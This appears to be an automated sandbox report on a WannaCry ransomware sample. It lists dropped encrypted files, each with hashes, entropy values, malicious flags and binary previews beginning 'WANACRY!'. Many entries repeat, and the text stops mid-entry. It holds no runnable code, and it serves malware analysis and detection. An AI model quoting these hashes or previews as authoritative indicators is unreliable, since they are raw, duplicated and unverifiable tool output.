                                                                                      Preview:WANACRY!.....5.K.z......j $..g..tT/*.u.{.%.......d....Sk..i..`}y.Km9....^..._....M..7I.b.8.9.O..q.?.....J..T..0>..D.H..,.W.^{e_,.F`}..C..=O..LX....Pp?..F)y..<..W@.&.Y.lC.hp.{..uf.d.7...{./d.e\..f.)..8.......p.Z.........<u.H,h.O'fpl..nU...t..D...%5..^l.0......]......,..t..."S.7i....BP_....o../..g...'n........D...7....".q...R.na...Y...\..t./1}...H...c.U.J..q.1.....Y.8.h...h&.le.'.e.x..hpH...,u@......8#.......s..V........... ...t_r.BR.z63.%I.X%..SRO.....H9......y......U...,XB......0q.......}PL...[.........>kg.....__M.w...O..i9+...3...-.....V.Y..z.O.b..Y.....c....L'.+.&..`.>..f$.v.(....+56...2.E<.?..`,.y=.p7.(..W.I..y...z.s...w;^[...1B..QN......S........RHy.C9...u.....o_....].......g........%~.J^......~....~P..]V.N.+......+..7/&K....V<!>...xT...VR..._t.@...#?{Z|...x:f.y.x|{.......SN...B1..66.+P`H..me...*.NF.....*0....@a..:.*....c02@I.{.Y/03WH..0..u..+..j..3.q}..?I.C........M.'...6.I..<..r.....m..)..........1..^.Z..b1.<.N.....13Q.V..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):243784
                                                                                      Entropy (8bit):7.999319240010299
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:Btd1a/h2U/KbDNAddAuqtiZX1EslV9jaE8jYfdvDBnY6pm:v7A3/KXNAddA4WYV9jagtlYL
                                                                                      MD5:E7ABC4D3DDEABBAC7E481062B362A8C1
                                                                                      SHA1:A2654D8A0043A1FAFAEF65A0FAE1B078858FC168
                                                                                      SHA-256:6A3F94DDA864D6B3F9BFEE3566DCF170B1E35CD9CB7794DCDA85D62D03F6697A
                                                                                      SHA-512:87614FFC3CFCC243B174AB060B9AEE86D4F267EA24A9AFABE15B48A6BBC6F9146CA072001E2CC9E0E50B14733A96CDF3EA065ECD4B7DF47BA97A9C08252264E2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....n.B.8qN.."Y..yL..,....@y>V.2my.9....&..v.M_.-s.....d.....I..G..~&...O.J>.....\..(4.A.{..27n;]..N?.......YS..z.e.nH.....6|..6.~.!"V.cu.:.;.@1k..8..E.oJ6.Q....S.a.1..........5......d7nW.....mnh...}.f....?j.......w..*<QSA.I.....7.|.s.H.e#...=.....&.........>....n...^...}.Z<*J......H.....r+_......;..S%..*j........9.5....o.K.^.<....c.z..`.f'.y ....8:.U.....x.n..Q*....3.)...7>...vK..(.M.7.}[."Q..?.......pPq...._r..:.o0.......Y.h..<C.....0...G....d+Q$y.{z/.S.r..dd7,>.......*L..l.<.bn....A......L..O.A..V....H....^&.t&J.|......U..+T.i..H.B...T.a..-.B..x,.........(.....5^vZ.d`.h.iA......I}...D1..s.It.@..J.R....;.]#.W.~C.2.bl!..g.....tO....-.....<Lx[...l..'O5.C$.96.Bn.......Br@?^..uY......B.(.R.;.G..{.<.5..........`L6........@*T.l.V...E.*?@.&.`....}.....=.Vi;...*..q2"z.>......~...}8..,p..N..F.7l...P9`e..#.Gn..8.Xi.....w}.m...3+....R...~.+...`.B..j....O..t#.z...py0./...*...m..X$v..X..~+....GH....<....!..P..4.G.."+.Rw.&...<w..Q..n...:
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):243784
                                                                                      Entropy (8bit):7.999319240010299
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:Btd1a/h2U/KbDNAddAuqtiZX1EslV9jaE8jYfdvDBnY6pm:v7A3/KXNAddA4WYV9jagtlYL
                                                                                      MD5:E7ABC4D3DDEABBAC7E481062B362A8C1
                                                                                      SHA1:A2654D8A0043A1FAFAEF65A0FAE1B078858FC168
                                                                                      SHA-256:6A3F94DDA864D6B3F9BFEE3566DCF170B1E35CD9CB7794DCDA85D62D03F6697A
                                                                                      SHA-512:87614FFC3CFCC243B174AB060B9AEE86D4F267EA24A9AFABE15B48A6BBC6F9146CA072001E2CC9E0E50B14733A96CDF3EA065ECD4B7DF47BA97A9C08252264E2
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....n.B.8qN.."Y..yL..,....@y>V.2my.9....&..v.M_.-s.....d.....I..G..~&...O.J>.....\..(4.A.{..27n;]..N?.......YS..z.e.nH.....6|..6.~.!"V.cu.:.;.@1k..8..E.oJ6.Q....S.a.1..........5......d7nW.....mnh...}.f....?j.......w..*<QSA.I.....7.|.s.H.e#...=.....&.........>....n...^...}.Z<*J......H.....r+_......;..S%..*j........9.5....o.K.^.<....c.z..`.f'.y ....8:.U.....x.n..Q*....3.)...7>...vK..(.M.7.}[."Q..?.......pPq...._r..:.o0.......Y.h..<C.....0...G....d+Q$y.{z/.S.r..dd7,>.......*L..l.<.bn....A......L..O.A..V....H....^&.t&J.|......U..+T.i..H.B...T.a..-.B..x,.........(.....5^vZ.d`.h.iA......I}...D1..s.It.@..J.R....;.]#.W.~C.2.bl!..g.....tO....-.....<Lx[...l..'O5.C$.96.Bn.......Br@?^..uY......B.(.R.;.G..{.<.5..........`L6........@*T.l.V...E.*?@.&.`....}.....=.Vi;...*..q2"z.>......~...}8..,p..N..F.7l...P9`e..#.Gn..8.Xi.....w}.m...3+....R...~.+...`.B..j....O..t#.z...py0./...*...m..X$v..X..~+....GH....<....!..P..4.G.."+.Rw.&...<w..Q..n...:
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):533032
                                                                                      Entropy (8bit):7.999736957381263
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:OycFHJ2bBndgwEhCMKOCrqy2Fl3OYRUvWT:O/ABnGBhCMKLrq9n3AvI
                                                                                      MD5:E28D9A0E4851EDC42F4B980845D666E2
                                                                                      SHA1:4EA654424E299F959F5A6656B24F2694457AA085
                                                                                      SHA-256:7955EF2B09D8D539D4A8FD6B5880C0AD5CFBB6E3A01EB83630645E95B1B57E5F
                                                                                      SHA-512:AA5A994CFB139F2C0B960E10D81A942419F653268A0FF76B9B3CAA839BBB7C1F496D740FC398C1FEB1DD0F3AEC19091E37B5C2B9BB2710054031263527F343CF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........@.alZw.^pX..q.S_&..3S.@......T.=........D7.(L.""R......Al......X3c..R.Q..8..z......e.o.u...-...0W..<..m..^.K...j..+I..".*..%.Vz.....g...............i...a..(#....c|.. .a.o.sTeFT}....l5".M..vp.2..O5...<.?...?..9V...(.'...:..... ..c.....p........!......E-r..<..b......w}.=...4..(....?.CP._.er<........(.4...5...#..U..v.2W.Ic.y....~*....XQ....K.....U.m.....rJj.g.m.....E....9.$*...J.*.k..j.P..3...d.[V%Y.w.N.F.].r.q.....ai.}....qu..q.*.Qv..#..ZB.w.~@..........Q.....B@.......N..^..]..7.f<.*.Lo....wH....>...G.m..G.}=..,x;..Z.=......ZZ.V>....!y.....@..h...y....A..=.88.A.B...G.).}>.q.%.`)N?%.~m-..d..5<.Q.U7I..r....@...!.+..&.-.SEC...ME...D,.\....Q.*v.: 5..[....V.Ko.t..5w..T'].B..`...i....7..-{..a_..............&....G...UO.1T.$i,..$..ah....}=X...^4..........F.I.D....t$I.,...J..c.y........>w.%0....c..%..t...?.......1..e...sdK..F.$.pv.$j..K._\TT.^.+X.....@(i.f(.m.R.}..o..y.0U...??..%.&...;><E.c.....p.I.v.n.E.....=.7A....z,.l..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):533032
                                                                                      Entropy (8bit):7.999736957381263
                                                                                      Encrypted:true
                                                                                      SSDEEP:12288:OycFHJ2bBndgwEhCMKOCrqy2Fl3OYRUvWT:O/ABnGBhCMKLrq9n3AvI
                                                                                      MD5:E28D9A0E4851EDC42F4B980845D666E2
                                                                                      SHA1:4EA654424E299F959F5A6656B24F2694457AA085
                                                                                      SHA-256:7955EF2B09D8D539D4A8FD6B5880C0AD5CFBB6E3A01EB83630645E95B1B57E5F
                                                                                      SHA-512:AA5A994CFB139F2C0B960E10D81A942419F653268A0FF76B9B3CAA839BBB7C1F496D740FC398C1FEB1DD0F3AEC19091E37B5C2B9BB2710054031263527F343CF
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........@.alZw.^pX..q.S_&..3S.@......T.=........D7.(L.""R......Al......X3c..R.Q..8..z......e.o.u...-...0W..<..m..^.K...j..+I..".*..%.Vz.....g...............i...a..(#....c|.. .a.o.sTeFT}....l5".M..vp.2..O5...<.?...?..9V...(.'...:..... ..c.....p........!......E-r..<..b......w}.=...4..(....?.CP._.er<........(.4...5...#..U..v.2W.Ic.y....~*....XQ....K.....U.m.....rJj.g.m.....E....9.$*...J.*.k..j.P..3...d.[V%Y.w.N.F.].r.q.....ai.}....qu..q.*.Qv..#..ZB.w.~@..........Q.....B@.......N..^..]..7.f<.*.Lo....wH....>...G.m..G.}=..,x;..Z.=......ZZ.V>....!y.....@..h...y....A..=.88.A.B...G.).}>.q.%.`)N?%.~m-..d..5<.Q.U7I..r....@...!.+..&.-.SEC...ME...D,.\....Q.*v.: 5..[....V.Ko.t..5w..T'].B..`...i....7..-{..a_..............&....G...UO.1T.$i,..$..ah....}=X...^4..........F.I.D....t$I.,...J..c.y........>w.%0....c..%..t...?.......1..e...sdK..F.$.pv.$j..K._\TT.^.+X.....@(i.f(.m.R.}..o..y.0U...??..%.&...;><E.c.....p.I.v.n.E.....=.7A....z,.l..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):44792
                                                                                      Entropy (8bit):7.9962748574049956
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:AI3zhQ5iEApuM356V2fhr/fZILjkfBcT6jmpQT0OI7r0qjCbHR5wEPf3P5Z:A+Q5iEApua55f9wxpQTnI7NWbxVf/v
                                                                                      MD5:1B8D7BF5547191B9274C3550662D957A
                                                                                      SHA1:38619E2217158702839202ED65DEAF4BE43E9C3F
                                                                                      SHA-256:D48819756F4987EC1A8EFF9CB40C0DAEFBB0831BA25F675C56F42DA309DD908A
                                                                                      SHA-512:063F469FB74B9F9A47CDD6603D635F30C0B35BD9FC67345C471FB8F5A588040C2200D7CE03FDEB359EE44219978DEDD33CD2F4400FFABBCEBBB432D7929C7E7B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....dFqA.....Y..;X..wVeE8c..P|....V.....z...[...36(..l;K.iJsY..:.A.#....f...?l...pPL.....M3I.....p.N......R....QB.p.N.....@.S.Kd\..O...A.b....p..Iv/.ms.....\...F....v..............i..#e.9.... .e.c....*.qUMR...b.....*......5."q...b.i.B.j....o=..+dZ...........U.6rz..qC+~.,J.._.6r.........}...."W....,E/.R.b v...N...).|R....r3.A.....`1T..|Q.`;.r..._..d......X.*....3c.~.....92...& .D...PU....E.q.....6E....\.p{...&[".....Q..'.9~.Z...H....ixd`..i.;B...D=..../........k.....~5\..z.....L.......V.T.K..LR#Z....h.3|'..6.o.j#.2..9w...V.x...V.z./.(+zd..@....I..+.eu..H....XB.~.....E{..R.f......w...B...!9./P.I...|.....K...7yhf./_........FE..2f...].!.I.b... K........./f.".p.m!....y..R..S...R...?....-.._^V+{....T.l........s.....Ur'1...pC.....2G.4....C..#k.....9.a..........{N.1.&x..:..kQ..&./=.y.t...A tn.~.......% H..........*Q...A.*......l.u..KI.....I}..1......C........p..^.y..5x....N,(H..(Q..'.......l.....[....Kbt../..Qn.[...._.i/wq5m.<2..*]B..4B}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):44792
                                                                                      Entropy (8bit):7.9962748574049956
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:AI3zhQ5iEApuM356V2fhr/fZILjkfBcT6jmpQT0OI7r0qjCbHR5wEPf3P5Z:A+Q5iEApua55f9wxpQTnI7NWbxVf/v
                                                                                      MD5:1B8D7BF5547191B9274C3550662D957A
                                                                                      SHA1:38619E2217158702839202ED65DEAF4BE43E9C3F
                                                                                      SHA-256:D48819756F4987EC1A8EFF9CB40C0DAEFBB0831BA25F675C56F42DA309DD908A
                                                                                      SHA-512:063F469FB74B9F9A47CDD6603D635F30C0B35BD9FC67345C471FB8F5A588040C2200D7CE03FDEB359EE44219978DEDD33CD2F4400FFABBCEBBB432D7929C7E7B
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....dFqA.....Y..;X..wVeE8c..P|....V.....z...[...36(..l;K.iJsY..:.A.#....f...?l...pPL.....M3I.....p.N......R....QB.p.N.....@.S.Kd\..O...A.b....p..Iv/.ms.....\...F....v..............i..#e.9.... .e.c....*.qUMR...b.....*......5."q...b.i.B.j....o=..+dZ...........U.6rz..qC+~.,J.._.6r.........}...."W....,E/.R.b v...N...).|R....r3.A.....`1T..|Q.`;.r..._..d......X.*....3c.~.....92...& .D...PU....E.q.....6E....\.p{...&[".....Q..'.9~.Z...H....ixd`..i.;B...D=..../........k.....~5\..z.....L.......V.T.K..LR#Z....h.3|'..6.o.j#.2..9w...V.x...V.z./.(+zd..@....I..+.eu..H....XB.~.....E{..R.f......w...B...!9./P.I...|.....K...7yhf./_........FE..2f...].!.I.b... K........./f.".p.m!....y..R..S...R...?....-.._^V+{....T.l........s.....Ur'1...pC.....2G.4....C..#k.....9.a..........{N.1.&x..:..kQ..&./=.y.t...A tn.~.......% H..........*Q...A.*......l.u..KI.....I}..1......C........p..^.y..5x....N,(H..(Q..'.......l.....[....Kbt../..Qn.[...._.i/wq5m.<2..*]B..4B}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):104008
                                                                                      Entropy (8bit):7.99784120016745
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:2fzxtogXYeFCq1jJo7nir5szmfO+ZHH0l:KzxtogX9MqtC7niryzKOEH0
                                                                                      MD5:8E097518F5EE3A0D74376AACAC964E9A
                                                                                      SHA1:E627175044E0BB1305D263BFD8E6C7C57A72A0A6
                                                                                      SHA-256:67F2A43767461D9DC8DB623DAB0C9FFE3FC3AD9F532BEC46D26C1D56253CC453
                                                                                      SHA-512:13A9DA313247A490465D635180F8D7224679899D66321BDFE512A91B1030579860ED9A84923C406BB4085C8C9E8F3291055729D4B6139D9340321BF3DA14F58F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t......w.<....o....u..Nu.x.].]..'......$=....?$xYG.S..M.7..X...7C..tU....Gz.Af......^.H.k....Ty3B.........T.........|..jF|n...e&..'..+.tF...w.SO.7.....y7.b...;......3.v....p.t*... i..2qz.==......2CG0.1.5W0kF.Skm..L.x...i0+..0....B..j...h..tKg`.J....%...........,.............>....?.k=...&.dz...E......[1. ......S...Zy..)@...i.....J.4...........]....63,...F.v...6...?....v~.C...x.`..,...a.eA.`.S..w.......x..:C..v.C...h..U.HDm^\.i\M+....@H....lc.r ..K...8...y|.#.X,... &..&...#......:;.;.B,..Y..\..-.....,.k...:V.~.K.3TMk';.\.5..y..#.7......p.u...[.^0...r..uw....C.E..v.^.FD.;..kn|.,HekCzp...A..r.[.8CDM...Z..H....-..d....J._9..T.5:.b"+g........5}..&...4......#:q.G....A..y..^-W.....y......I.s.r..omN.?..+3L......{....u. .....{...f.XlP...\A&.o....[.k0...i|.2..lw.\/.h..8tO7s.U..x.j.u ..Qp....\.Z$.*...?i.!....'....F..X..O@.],.uy.8...cZ.<...>L/.l../._E..w...4L...u.}...Cj....5...n..:.l..u$..\.J..B|!...a...g....LP. >...u......~....v.].../..zH
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):104008
                                                                                      Entropy (8bit):7.99784120016745
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:2fzxtogXYeFCq1jJo7nir5szmfO+ZHH0l:KzxtogX9MqtC7niryzKOEH0
                                                                                      MD5:8E097518F5EE3A0D74376AACAC964E9A
                                                                                      SHA1:E627175044E0BB1305D263BFD8E6C7C57A72A0A6
                                                                                      SHA-256:67F2A43767461D9DC8DB623DAB0C9FFE3FC3AD9F532BEC46D26C1D56253CC453
                                                                                      SHA-512:13A9DA313247A490465D635180F8D7224679899D66321BDFE512A91B1030579860ED9A84923C406BB4085C8C9E8F3291055729D4B6139D9340321BF3DA14F58F
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....t......w.<....o....u..Nu.x.].]..'......$=....?$xYG.S..M.7..X...7C..tU....Gz.Af......^.H.k....Ty3B.........T.........|..jF|n...e&..'..+.tF...w.SO.7.....y7.b...;......3.v....p.t*... i..2qz.==......2CG0.1.5W0kF.Skm..L.x...i0+..0....B..j...h..tKg`.J....%...........,.............>....?.k=...&.dz...E......[1. ......S...Zy..)@...i.....J.4...........]....63,...F.v...6...?....v~.C...x.`..,...a.eA.`.S..w.......x..:C..v.C...h..U.HDm^\.i\M+....@H....lc.r ..K...8...y|.#.X,... &..&...#......:;.;.B,..Y..\..-.....,.k...:V.~.K.3TMk';.\.5..y..#.7......p.u...[.^0...r..uw....C.E..v.^.FD.;..kn|.,HekCzp...A..r.[.8CDM...Z..H....-..d....J._9..T.5:.b"+g........5}..&...4......#:q.G....A..y..^-W.....y......I.s.r..omN.?..+3L......{....u. .....{...f.XlP...\A&.o....[.k0...i|.2..lw.\/.h..8tO7s.U..x.j.u ..Qp....\.Z$.*...?i.!....'....F..X..O@.],.uy.8...cZ.<...>L/.l../._E..w...4L...u.}...Cj....5...n..:.l..u$..\.J..B|!...a...g....LP. >...u......~....v.].../..zH
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):217800
                                                                                      Entropy (8bit):7.999033980332819
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:N5A7wOd3cTSJQtZxn+/KU41B7eJvaCSNLhsGTJ6ybvr4MLZGCL3HCqddIwCLZ:N5+wOx8LUFMoMhBTJ6ybjBL4wCLZ
                                                                                      MD5:ED2192CC461482567090FBE12BB5B621
                                                                                      SHA1:DAFADC2922FF5B83F66F6A8B1C395AEB409F33B4
                                                                                      SHA-256:DDAC225C3E2F26BC8EDC1F6A55F4DBC7945D277420C45E755F3FC0B0B719F897
                                                                                      SHA-512:6EFD47E115C382BB26250E96B0EFD48FF4A74269D483340D57924AC427FB993C5A8C61C24B580A83E4FE7AA29B884286F0B9A746F5631433CB9E1547A896F4D3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........G.8>..^...W..c.m.....d.a.0..`...6...;,<I. ..=?.rf..&...T@..^.s..sK......#.l...F...k.qqi.../.....Q....R.f6..:..\....R|.xf6b.<.t.*..:...#..e)...E.T....3c.#F..K.....:...6..'.dF.)kS..=...$)I.]+b..&...*+..}^....8...1.aI_.c,.5..Q....(E.`.;......Q......jZ.g..+...../...Nd.&...q.k~..`*$..d#.?.y..*.Aa..!.}5?..=s...).I...<..2J.....h!{...iD....Lv.....#g.,...uX.drg.......,....<7^."....>...........`.."...FI|.f2N0.$_.g[EL.c.7.0'}.(Y......Q..E?.._h\.V....:...6....$...if.,....d...W.o...-.......W.&Z..+..<.|R.' ...,...P.cUw...G.)..d..Ro.#...=...h9..'.'.unJ.u..l.......{.~...h....jY..XN..f....t.k.r_.o(.3G......B.;..}.J..0.|..!.uhR8...x..5'....E..i..L........X...W...Zw..Dg3.2..5..J0..V2=.2...>.....fr..Q.e.......;..:.2...O._2.h......0......k.N|..&.V.z.-.7...E.............f..vP8....-V...}:bI_z..o.Jj34..<.j.Y52.TT@...1.I.. .wJ.._.4.[^U..;uX..;e^e3...Vd].M.sXG9.C{.i...#....=.Ye...9;&./.K..E...E........E.0..).~.-.rlp.@+s...1.>.x.......QV....X.\..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):217800
                                                                                      Entropy (8bit):7.999033980332819
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:N5A7wOd3cTSJQtZxn+/KU41B7eJvaCSNLhsGTJ6ybvr4MLZGCL3HCqddIwCLZ:N5+wOx8LUFMoMhBTJ6ybjBL4wCLZ
                                                                                      MD5:ED2192CC461482567090FBE12BB5B621
                                                                                      SHA1:DAFADC2922FF5B83F66F6A8B1C395AEB409F33B4
                                                                                      SHA-256:DDAC225C3E2F26BC8EDC1F6A55F4DBC7945D277420C45E755F3FC0B0B719F897
                                                                                      SHA-512:6EFD47E115C382BB26250E96B0EFD48FF4A74269D483340D57924AC427FB993C5A8C61C24B580A83E4FE7AA29B884286F0B9A746F5631433CB9E1547A896F4D3
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!..........G.8>..^...W..c.m.....d.a.0..`...6...;,<I. ..=?.rf..&...T@..^.s..sK......#.l...F...k.qqi.../.....Q....R.f6..:..\....R|.xf6b.<.t.*..:...#..e)...E.T....3c.#F..K.....:...6..'.dF.)kS..=...$)I.]+b..&...*+..}^....8...1.aI_.c,.5..Q....(E.`.;......Q......jZ.g..+...../...Nd.&...q.k~..`*$..d#.?.y..*.Aa..!.}5?..=s...).I...<..2J.....h!{...iD....Lv.....#g.,...uX.drg.......,....<7^."....>...........`.."...FI|.f2N0.$_.g[EL.c.7.0'}.(Y......Q..E?.._h\.V....:...6....$...if.,....d...W.o...-.......W.&Z..+..<.|R.' ...,...P.cUw...G.)..d..Ro.#...=...h9..'.'.unJ.u..l.......{.~...h....jY..XN..f....t.k.r_.o(.3G......B.;..}.J..0.|..!.uhR8...x..5'....E..i..L........X...W...Zw..Dg3.2..5..J0..V2=.2...>.....fr..Q.e.......;..:.2...O._2.h......0......k.N|..&.V.z.-.7...E.............f..vP8....-V...}:bI_z..o.Jj34..<.j.Y52.TT@...1.I.. .wJ.._.4.[^U..;uX..;e^e3...Vd].M.sXG9.C{.i...#....=.Ye...9;&./.K..E...E........E.0..).~.-.rlp.@+s...1.>.x.......QV....X.\..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.133721165010427
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEx5amBhzGayIp7DHtNG5ee3CkiaUz/WXwebHoR9SuvJHQ:bkECmBdPVNG5eo66XFuHQ
                                                                                      MD5:3241C5A3AACCE6D9A132862215F4DCA5
                                                                                      SHA1:E074BA31DB12015C020A81FD61BAFE9A6C9DD3BA
                                                                                      SHA-256:9417D7E3C2E90DC08DDD36A4AB1E115E5E045183335A4201780EEE916C76274E
                                                                                      SHA-512:ABC532FD16E9909B488E4DF8B4A95D7B20057ED19EE818C0FBCEEA91DA2491020775F815E422779897FA98439FCA310965D9A76BE409E3C7F9BC9205FE1A10CB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....<.b.5...'#'L.....T.-LIO...0.`C8O{a....P.>.wB).......9.&%s@..W...-.v^.Q.A..S.._..&AS.......d......-$."5M?"...3..8.X.......3.t...Y....)....G.l......S. Ui..i#S.Z...8../.a.Z ...g.1e.L.r..z.G..tS2&m1D.*..=...C...>..g...u6.>.S.....U...Q....#J..n._A.............V.>..iG..b.2.S.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.133721165010427
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEx5amBhzGayIp7DHtNG5ee3CkiaUz/WXwebHoR9SuvJHQ:bkECmBdPVNG5eo66XFuHQ
                                                                                      MD5:3241C5A3AACCE6D9A132862215F4DCA5
                                                                                      SHA1:E074BA31DB12015C020A81FD61BAFE9A6C9DD3BA
                                                                                      SHA-256:9417D7E3C2E90DC08DDD36A4AB1E115E5E045183335A4201780EEE916C76274E
                                                                                      SHA-512:ABC532FD16E9909B488E4DF8B4A95D7B20057ED19EE818C0FBCEEA91DA2491020775F815E422779897FA98439FCA310965D9A76BE409E3C7F9BC9205FE1A10CB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....<.b.5...'#'L.....T.-LIO...0.`C8O{a....P.>.wB).......9.&%s@..W...-.v^.Q.A..S.._..&AS.......d......-$."5M?"...3..8.X.......3.t...Y....)....G.l......S. Ui..i#S.Z...8../.a.Z ...g.1e.L.r..z.G..tS2&m1D.*..=...C...>..g...u6.>.S.....U...Q....#J..n._A.............V.>..iG..b.2.S.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.247941456684352
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEEmSsklGwUBrPXF1/jsB+94KrogJZBngWV3q628ZQqpJDCEKfykysn:bkEElplGwUBd1IfKroAmz6nRBCEEy0n
                                                                                      MD5:D8D86275100DBBC99703BB2D3EFF7442
                                                                                      SHA1:78F216856CCD58E6D5F81455FA4A49E4B85A6A05
                                                                                      SHA-256:27DD5E50BC8552DD66C2942EE30BBCAE9F051819DA8CA129825FBE2F1B4B6766
                                                                                      SHA-512:B49EC5B0F60E5996CD8E30874FD7D5E48B72E0AFCA219DA5750CCBE40CA4EA8D917C31FB87105C7389933F7974221527FB22ED46AD6D59EF8AC5EC75E8C07E9D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......c...6...w2.!.... ..E...>.G........A......1..C.;..?,..*....B ..AZ...K...F.X.....t.....xyBo...'W......m=...).3>z..>.2....h.j.....+.B6..Z....R`...`u..+C..|0...w.e.n..-.....w....+v...E\J ~.l...Z-..S..{..D.....Pm.J.M.u....o.d.H.V.^.1..E......&8.............q(.v/Rv.l.(g...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):296
                                                                                      Entropy (8bit):7.247941456684352
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bkEEmSsklGwUBrPXF1/jsB+94KrogJZBngWV3q628ZQqpJDCEKfykysn:bkEElplGwUBd1IfKroAmz6nRBCEEy0n
                                                                                      MD5:D8D86275100DBBC99703BB2D3EFF7442
                                                                                      SHA1:78F216856CCD58E6D5F81455FA4A49E4B85A6A05
                                                                                      SHA-256:27DD5E50BC8552DD66C2942EE30BBCAE9F051819DA8CA129825FBE2F1B4B6766
                                                                                      SHA-512:B49EC5B0F60E5996CD8E30874FD7D5E48B72E0AFCA219DA5750CCBE40CA4EA8D917C31FB87105C7389933F7974221527FB22ED46AD6D59EF8AC5EC75E8C07E9D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......c...6...w2.!.... ..E...>.G........A......1..C.;..?,..*....B ..AZ...K...F.X.....t.....xyBo...'W......m=...).3>z..>.2....h.j.....+.B6..Z....R`...`u..+C..|0...w.e.n..-.....w....+v...E\J ~.l...Z-..S..{..D.....Pm.J.M.u....o.d.H.V.^.1..E......&8.............q(.v/Rv.l.(g...
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):217800
